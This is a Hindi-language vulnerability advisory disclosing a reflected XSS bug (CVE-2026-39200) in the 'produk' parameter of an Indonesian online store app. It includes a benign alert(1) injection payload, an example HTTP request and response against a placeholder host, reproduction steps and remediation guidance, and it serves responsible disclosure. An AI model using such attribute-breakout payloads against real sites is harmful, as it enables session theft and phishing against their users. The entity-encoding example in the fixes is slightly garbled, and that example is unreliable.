
produk अनुरोध पैरामीटर का मान एक HTML टैग विशेषता के मान में कॉपी किया जाता है जो दोहरे उद्धरण चिह्नों में संलग्न है। पेलोड xbnw0"><script>alert(1)</script>skc2h produk पैरामीटर में प्रस्तुत किया गया था। यह इनपुट एप्लिकेशन के प्रतिक्रिया में xbnw0\"><script>alert(1)</script>skc2h के रूप में प्रतिध्वनित किया गया था।
एक रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता Toko Online RotI वेब एप्लिकेशन के produk अनुरोध पैरामीटर में पहचानी गई थी। एप्लिकेशन उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को HTML-एनकोड करने में विफल रहता है, इससे पहले कि इसे एक HTML टैग विशेषता के अंदर प्रतिबिंबित किया जाए जो दोहरे उद्धरण चिह्नों में संलग्न है। एक हमलावर एक दुर्भावनापूर्ण URL बना सकता है, जिस पर पीड़ित द्वारा विज़िट किए जाने पर, पीड़ित के ब्राउज़र सत्र के संदर्भ में मनमाना JavaScript निष्पादित होता है।
| फ़ील्ड | मान |
|---|
| CVE ID | CVE-2026-39200 |
| भेद्यता प्रकार | CWE-79 — वेब पृष्ठ निर्माण के दौरान इनपुट का अनुचित तटस्थीकरण (रिफ्लेक्टेड XSS) |
| प्रभावित उत्पाद | Toko Online RotI (इंडोनेशियाई ऑनलाइन स्टोर) |
| प्रभावित पैरामीटर | produk |
| खोजकर्ता | Uzair Ali (r00tali) — प्रवेश परीक्षक / बग बाउंटी हंटर |
| खोज तिथि | 2026-07-03 |
| CVE निर्दिष्ट | 2026-07-12 |
| सलाह प्रकाशित | 2026-07-19 |
produk अनुरोध पैरामीटर को दोहरे उद्धरण चिह्नों में संलग्न HTML टैग विशेषता के मान में शब्दशः कॉपी किया जाता है। क्योंकि एप्लिकेशन उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को प्रतिबिंबित करने से पहले HTML-एनकोड नहीं करता है, एक हमलावर एक पेलोड सबमिट करके विशेषता से बाहर निकल सकता है जिसमें एक समापन दोहरा उद्धरण और उसके बाद HTML/JavaScript पेलोड शामिल होता है।
xbnw0"><script>alert(1)</script>skc2h
जब यह पेलोड produk पैरामीटर के रूप में सबमिट किया जाता है, तो एप्लिकेशन इनपुट को प्रतिक्रिया में अनएस्केप्ड रूप में वापस भेजता है। समापन "> मूल विशेषता को समाप्त करता है, और इंजेक्ट किया गया <script>alert(1)</script> ब्लॉक ब्राउज़र द्वारा एक नए HTML तत्व के रूप में व्याख्या किया जाता है, जो उपयोगकर्ता के सत्र में मनमाना JavaScript निष्पादित करता है।
भेद्य HTML प्रतिक्रिया इस प्रकार दिखती है:
<!-- BEFORE injection -->
<input type="text" name="produk" value="USER_INPUT" />
<!-- AFTER injection with payload xbnw0"><script>alert(1)</script>skc2h -->
<input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
^^^^^^^^^^^^^^^^^^^^^^^^
Browser executes this
GET /[vulnerable-endpoint]?produk=xbnw0%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3Eskc2h HTTP/1.1
Host: [target-host]
User-Agent: Mozilla/5.0
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
<html>
<body>
<!-- ... -->
<input type="text" name="produk" value="xbnw0"><script>alert(1)</script>skc2h" />
<!-- ... -->
</body>
</html>
produk पैरामीटर को HTML विशेषता के अंदर प्रतिबिंबित करता है (जैसे, उत्पाद खोज, विवरण, या फ़िल्टर पृष्ठ)।produk पैरामीटर मान को निम्नलिखित पेलोड से बदलें:
xbnw0"><script>alert(1)</script>skc2h
" से बाहर निकलकर DOM में एक मान्य <script> तत्व उत्पन्न करता है।alert(1) संवाद प्रदर्शित होता है, जो पीड़ित के सत्र में मनमाना JavaScript निष्पादन की पुष्टि करता है।इस रिफ्लेक्टेड XSS के सफल शोषण से हमलावर निम्नलिखित कर सकता है:
चूंकि भेद्यता प्रतिबिंबित है, शोषण के लिए केवल पीड़ित द्वारा एक तैयार लिंक पर क्लिक करने की आवश्यकता होती है, जिससे फ़िशिंग अभियानों में इसे आसानी से हथियार बनाया जा सकता है।
CVSS v3.1 (अनुमानित): 6.1 (मध्यम) — AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
इस भेद्यता को ठीक करने के लिए, विक्रेता को चाहिए:
<, >, ", ', और & को एनकोड करें (जैसे, <, >, ", ', &)।htmlspecialchars($input, ENT_QUOTES, 'UTF-8')HttpUtility.HtmlEncode(input) या <%: %> सिंटैक्स{{ input }} (डिफ़ॉल्ट रूप से ऑटो-एस्केप)Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
HttpOnly और Secure फ़्लैग सेट करें ताकि JavaScript उन्हें पढ़ने से रोका जा सके।produk पैरामीटर को अपेक्षित उत्पाद पहचानकर्ताओं (संख्यात्मक आईडी, स्लग, आदि) की एक अनुमति-सूची के विरुद्ध मान्य करें और जो कुछ भी मेल नहीं खाता है उसे अस्वीकार करें।X-Content-Type-Options: nosniff जोड़ें।| तिथि | घटना |
|---|---|
| 2026-07-03 | अधिकृत सुरक्षा परीक्षण के दौरान भेद्यता की खोज |
| 2026-07-03 | cveform.mitre.org के माध्यम से MITRE से CVE ID का अनुरोध |
| 2026-07-12 | MITRE असाइनमेंट टीम द्वारा CVE-2026-39200 निर्दिष्ट |
| 2026-07-19 | सार्वजनिक सलाह प्रकाशित |
** Uzair Ali (r00tali)** — प्रवेश परीक्षक / बग बाउंटी हंटर / सुरक्षा शोधकर्ता
यह सलाह केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए प्रकाशित की गई है। भेद्यता को MITRE CVE असाइनमेंट टीम के माध्यम से जिम्मेदार प्रकटीकरण प्रक्रिया के द्वारा रिपोर्ट किया गया था। कोई गोपनीय विक्रेता जानकारी, ग्राहक डेटा, या मालिकाना कोड का खुलासा नहीं किया गया है। प्रूफ-ऑफ-कॉन्सेप्ट एक सौम्य alert(1) पेलोड का उपयोग करता है और इसका उद्देश्य बग के अस्तित्व को प्रदर्शित करना है, न कि लाइव सेवा के खिलाफ हमलों को सुविधाजनक बनाना।